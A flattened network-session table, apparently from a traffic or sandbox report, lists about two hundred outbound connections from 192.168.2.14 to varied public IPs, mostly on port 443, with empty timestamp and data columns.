                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15572192.168.2.1444388170.197.197.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15573192.168.2.14339045.115.236.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15574192.168.2.145393466.186.170.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15575192.168.2.1458258101.133.76.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15576192.168.2.1435220201.80.248.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15577192.168.2.144578813.93.101.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15578192.168.2.1445360183.124.122.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15579192.168.2.144672641.80.41.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15580192.168.2.1437490167.164.139.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15581192.168.2.1452664143.42.165.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15582192.168.2.1446836121.225.165.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15583192.168.2.1446490174.33.194.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15584192.168.2.1438176222.1.47.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15585192.168.2.143746287.106.43.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15586192.168.2.1446510100.145.249.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15587192.168.2.143291812.24.69.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15588192.168.2.1449116133.74.31.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15589192.168.2.1450456205.62.148.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15590192.168.2.1452436197.7.242.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15591192.168.2.1455098131.105.140.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15592192.168.2.14468641.86.187.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15593192.168.2.1446232160.221.139.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15594192.168.2.145305035.102.205.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15595192.168.2.144959289.228.120.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15596192.168.2.144687836.240.58.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15597192.168.2.1449350162.55.208.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15598192.168.2.1460100171.117.173.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15599192.168.2.143645618.184.226.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15600192.168.2.1452004144.130.15.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15601192.168.2.1437292143.78.6.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15602192.168.2.1439474174.91.193.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15603192.168.2.1457452100.228.153.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15604192.168.2.144856023.77.59.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15605192.168.2.1449872219.26.143.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15606192.168.2.1447152209.204.195.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15607192.168.2.1436528133.70.204.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15608192.168.2.144778252.58.100.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15609192.168.2.1437170184.253.111.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15610192.168.2.1455616164.74.55.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15611192.168.2.14424465.138.171.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15612192.168.2.1453642136.66.10.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15613192.168.2.1446302160.209.108.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15614192.168.2.144039445.151.27.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15615192.168.2.145650665.59.130.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15616192.168.2.143448074.176.41.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15617192.168.2.1450412152.6.37.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15618192.168.2.145371675.118.215.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15619192.168.2.1440952157.129.179.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15620192.168.2.1447106158.113.78.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15621192.168.2.1441760117.105.229.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15622192.168.2.1459396178.184.86.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15623192.168.2.143574066.15.88.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15624192.168.2.145567661.222.93.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15625192.168.2.145918827.205.213.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15626192.168.2.1440062145.31.17.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15627192.168.2.1451432203.187.197.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15628192.168.2.1458728118.140.148.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15629192.168.2.1454496222.20.198.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15630192.168.2.1441584150.174.12.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15631192.168.2.144150688.67.250.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15632192.168.2.1455598132.244.243.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15633192.168.2.1459698182.170.63.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15634192.168.2.1433072137.74.177.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15635192.168.2.144067818.194.122.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15636192.168.2.146054469.1.178.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15637192.168.2.1452940201.176.60.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15638192.168.2.143593640.73.158.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15639192.168.2.144913475.242.195.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15640192.168.2.1454630111.194.88.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15641192.168.2.1457864186.0.42.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15642192.168.2.145692293.79.206.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15643192.168.2.1450848221.60.25.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15644192.168.2.1451350132.51.169.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15645192.168.2.1436758134.42.155.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15646192.168.2.1447386133.123.252.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15647192.168.2.144788490.169.46.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15648192.168.2.144294018.163.63.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15649192.168.2.145190614.97.127.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15650192.168.2.1433900119.243.63.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15651192.168.2.14439244.75.57.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15652192.168.2.1437380198.190.130.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15653192.168.2.1457798140.8.150.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15654192.168.2.144640864.9.179.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15655192.168.2.1459640131.89.208.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15656192.168.2.145407034.38.155.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15657192.168.2.145875436.48.176.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15658192.168.2.1460922128.37.126.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15659192.168.2.145293646.210.74.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15660192.168.2.144729080.48.103.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15661192.168.2.1451294104.56.188.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15662192.168.2.145161425.237.136.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15663192.168.2.143599041.144.88.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15664192.168.2.1445532207.133.143.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15665192.168.2.143292885.20.95.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15666192.168.2.1442350149.187.89.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15667192.168.2.1438504112.196.214.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15668192.168.2.1434688137.40.199.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15669192.168.2.1436130154.192.113.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15670192.168.2.143851474.120.168.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15671192.168.2.1452124203.238.192.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15672192.168.2.1440530211.157.47.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15673192.168.2.1457746190.130.199.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15674192.168.2.144706054.136.229.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15675192.168.2.1446534168.187.63.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15676192.168.2.1456646172.179.68.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15677192.168.2.1449434155.172.15.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15678192.168.2.1433008104.77.221.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15679192.168.2.1442358150.203.49.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15680192.168.2.1437302103.84.8.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15681192.168.2.1447946155.17.215.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15682192.168.2.1435732172.214.249.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15683192.168.2.144456058.24.242.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15684192.168.2.144834625.91.24.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15685192.168.2.145781058.139.219.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15686192.168.2.1442500148.228.98.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15687192.168.2.1454854159.187.135.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15688192.168.2.145920478.194.207.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15689192.168.2.144655489.236.169.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15690192.168.2.144103458.115.199.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15691192.168.2.1439514124.84.226.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15692192.168.2.1446972190.9.58.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15693192.168.2.145767066.13.123.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15694192.168.2.145339081.124.189.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15695192.168.2.145838085.111.90.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15696192.168.2.1436954112.103.128.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15697192.168.2.145204052.81.174.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15698192.168.2.1450070108.67.27.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15699192.168.2.145903489.69.9.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15700192.168.2.1458236119.110.58.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15701192.168.2.1437274201.36.132.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15702192.168.2.1460724112.166.121.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15703192.168.2.145847074.190.94.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15704192.168.2.143778287.33.166.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15705192.168.2.144062886.218.244.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15706192.168.2.1453784183.91.20.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15707192.168.2.1446576187.191.61.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15708192.168.2.14335341.117.65.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15709192.168.2.1444936142.194.178.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15710192.168.2.145330674.194.6.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15711192.168.2.1459876141.6.161.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15712192.168.2.144104043.78.217.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15713192.168.2.144762627.223.58.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15714192.168.2.1432918107.84.61.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15715192.168.2.144858878.204.198.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15716192.168.2.144827292.250.31.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15717192.168.2.143920677.54.203.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15718192.168.2.1442772101.87.41.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15719192.168.2.143984487.80.156.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15720192.168.2.1453290155.250.162.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15721192.168.2.145059217.60.130.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15722192.168.2.145011841.79.78.818080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15723192.168.2.1437130148.184.8.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15724192.168.2.145372874.63.95.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15725192.168.2.1437850156.82.246.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15726192.168.2.145694273.54.53.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15727192.168.2.145954819.123.92.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15728192.168.2.1448134104.26.54.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15729192.168.2.1450262144.41.25.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15730192.168.2.1456308128.141.196.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15731192.168.2.1459728114.27.211.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15732192.168.2.1440568210.143.189.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15733192.168.2.1435440175.112.42.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15734192.168.2.145088213.191.193.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15735192.168.2.145189899.173.8.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15736192.168.2.143398423.88.190.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15737192.168.2.14378989.180.36.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15738192.168.2.1460702123.239.109.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15739192.168.2.1442114221.195.183.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15740192.168.2.1440594135.200.198.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15741192.168.2.1433330148.208.152.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15742192.168.2.1451860205.146.92.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15743192.168.2.1440508129.213.142.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15744192.168.2.144636091.118.61.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15745192.168.2.1438684182.247.193.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15746192.168.2.1442088197.25.244.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15747192.168.2.1455706142.231.209.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15748192.168.2.1459722173.142.55.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15749192.168.2.1442744195.45.246.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15750192.168.2.144485438.92.132.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15751192.168.2.1435506136.42.189.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15752192.168.2.144631852.230.17.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15753192.168.2.144574695.253.105.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15754192.168.2.1439226167.195.7.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15755192.168.2.1446844158.25.147.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15756192.168.2.1458668172.92.135.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15757192.168.2.144872850.60.65.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15758192.168.2.1449030201.176.119.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15759192.168.2.1455574138.173.153.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15760192.168.2.145026643.168.61.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15761192.168.2.144215825.198.55.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15762192.168.2.1452286157.20.246.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15763192.168.2.143398227.213.154.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15764192.168.2.143551440.17.198.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15765192.168.2.143301496.210.44.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15766192.168.2.146072239.138.103.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15767192.168.2.1451824183.59.43.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15768192.168.2.144614483.2.190.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15769192.168.2.145397693.85.31.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15770192.168.2.1452590186.195.183.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15771192.168.2.144025014.151.167.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15772192.168.2.1449940105.187.238.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15773192.168.2.1439572193.1.88.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15774192.168.2.145688093.158.50.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15775192.168.2.144842065.154.90.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15776192.168.2.143615069.246.62.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15777192.168.2.1441806165.112.231.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15778192.168.2.1434666107.43.133.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15779192.168.2.143815088.94.233.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15780192.168.2.1445532186.173.21.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15781192.168.2.14511321.176.59.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15782192.168.2.145914812.184.148.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15783192.168.2.1451674153.10.21.70443
                                                      TimestampBytes transferredDirectionData


